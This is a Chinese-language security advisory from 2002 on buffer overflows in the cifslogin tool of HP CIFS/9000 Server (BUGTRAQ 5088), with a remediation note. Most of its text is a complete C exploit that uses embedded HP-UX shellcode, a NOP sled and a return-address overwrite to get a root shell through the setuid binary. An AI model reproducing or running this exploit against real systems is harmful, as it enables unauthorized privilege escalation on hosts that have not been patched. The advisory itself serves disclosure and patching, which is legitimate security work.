HP CIFSLogin缓冲区溢出漏洞发布时间:2002-11-13 更新时间:2002-11-13 严重程度:高 威胁程度:本地管理员权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:5088 受影响系统 HP CIFS/9000 Server A.01.06详细描述 与CIFS/9000一起发布的/opt/cifsclient/bin/cifslogin工具存在多个命令行选项缓冲区溢出漏洞。提供超长的参数值给'-U'、'-D'、'-P'、'-S'、'-N'和'-u'等命令行选项会导致溢出的发生。 测试代码 /* Name : ex_cifslogin.c Compile : cc ex_cifslogin -o cifslogin Purpose : exploit cifslogin command for HP-UX 11.11 11.0 10.20,to get root shell Author : watercloud < safesuite@263.net, watercloud@xfocus.net > Date : 2002-11-6 Announce: Use as your own risk。 Thanks : bear < bearundertree@163.com > Tested : HPUX B11.11 */ #include<stdio.h> #define T_LEN 2304 #define BUFF_LEN 2176 #define NOP 0x0b390280 char shellcode[]= "\xe8\x3f\x1f\xfd\xb4\x23\x03\xe8\x60\x60\x3c\x61\x0b\x39\x02" "\x99\x34\x1a\x3c\x53\x0b\x43\x06\x1a\x20\x20\x08\x01\x34\x16\x03" "\xe8\xe4\x20\xe0\x08\x96\xd6\x03\xfe/bin/shA"; long addr; char buffer[T_LEN]; main() { int addr_off =800 ; int n=BUFF_LEN/4,i=0; long * ap = (long *) &buffer[BUFF_LEN]; char * sp = &buffer[BUFF_LEN-strlen(shellcode)]; long * np = (long *) buffer; addr = ((long) &addr_off + T_LEN ) & 0xffffff40 +0x40 ; for(i=0;i<n;np[i++]=NOP); memcpy(sp,shellcode,strlen(shellcode)); for(i=0;i<(T_LEN-BUFF_LEN)/4;ap[i++]=addr+addr_off); printf("SP=0x%x EXP_SP=0x%x OFF=0x%x (%i)\n",(long)&addr_off & 0xffffff40,addr,addr_off); printf("Addr =0x%x NOP_LEN=%i\n",addr+addr_off,BUFF_LEN-strlen(shellcode)); printf("BUFFER_LEN=%i\n",strlen(buffer)); execl("/opt/cifsclient/bin/cifslogin","cifslogin","123",buffer,NULL); } 解决方案 暂时去掉程序的suid位,或升级到A.01.07版本。 相关信息 Alex Hernandez <alex_hernandez@ureach.com> watercloud < safesuite@263.net, watercloud@xfocus.net > |
